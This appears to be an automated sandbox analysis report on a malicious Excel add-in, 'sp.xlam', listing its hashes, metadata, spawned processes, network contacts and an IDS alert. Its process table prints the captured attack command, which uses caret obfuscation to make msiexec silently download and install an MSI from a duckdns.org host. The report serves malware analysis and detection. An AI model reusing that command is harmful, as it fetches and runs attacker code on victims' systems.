| Field | Value |
|---|---|
| File name | sp.xlam |
| Full analysis | https://app.any.run/tasks/3f9159d3-dd14-4d5a-a411-beb16db69e76 |
| Verdict | Malicious activity |
| Analysis date | September 18, 2019, 15:31:56 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | 5C3CE41ED7B1C0C8E168E993528FF7A1 |
| SHA1 | C9DD25DD44CA65628FA1E8E3AD4851D666ADA094 |
| SHA256 | E42C0FD3805A25CD66ECD040829262B93C807084A556C73E7C9548254637893A |
| SSDEEP | 192:Aexlcoq+8QkFaEMJJm9cG6ZAK0u+ofhQxizT3W7+p+1iTvUGPjpIzB:AKlr8F92JvGlY+ofhQITMaTsGPuN |
| Extension | File type (confidence) |
|---|---|
| .xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8) |
| .xlsx | Excel Microsoft Office Open XML Format document (30) |
| .zip | Open Packaging Conventions container (15.4) |
| .zip | ZIP compressed archive (3.5) |
| Property | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0006 |
| ZipCompression | Deflated |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCRC | 0x8d5748fb |
| ZipCompressedSize | 368 |
| ZipUncompressedSize | 1087 |
| ZipFileName | [Content_Types].xml |
| Property | Value |
|---|---|
| Creator | admin |
| LastModifiedBy | admin |
| CreateDate | 2019:09:17 18:49:34Z |
| ModifyDate | 2019:09:17 18:49:34Z |
| Application | Microsoft Excel |
| DocSecurity | None |
| ScaleCrop | No |
| HeadingPairs | |
| TitlesOfParts | Sheet1 |
| Company | - |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| AppVersion | 15.03 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3384 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
| 3920 | "C:\Windows\System32\cmd.exe" /c msie^x^EC /i http://s321.duckdns.org/v/c/g/t/the.msi /qn | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
| 2488 | msiexEC /i http://s321.duckdns.org/v/c/g/t/the.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe |
| 4020 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe |

| PID | User | Company | Integrity Level | Description | Exit code | Version |
|---|---|---|---|---|---|---|
| 3384 | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 0 | 14.0.6024.1000 |
| 3920 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1619 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2488 | admin | Microsoft Corporation | MEDIUM | Windows® installer | 1619 | 5.0.7600.16385 (win7_rtm.090713-1255) |
| 4020 | SYSTEM | Microsoft Corporation | SYSTEM | Windows® installer | | 5.0.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR97DF.tmp.cvr | — | — | — |
| 3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$sp.xlam | — | — | — |
| 3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF5409E013CF99F357.TMP | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4020 | msiexec.exe | 23.249.163.172:80 | s321.duckdns.org | ColoCrossing | US | malicious |
| Domain | IP | Reputation |
|---|---|---|
| s321.duckdns.org | | malicious |
| dns.msftncsi.com | | shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |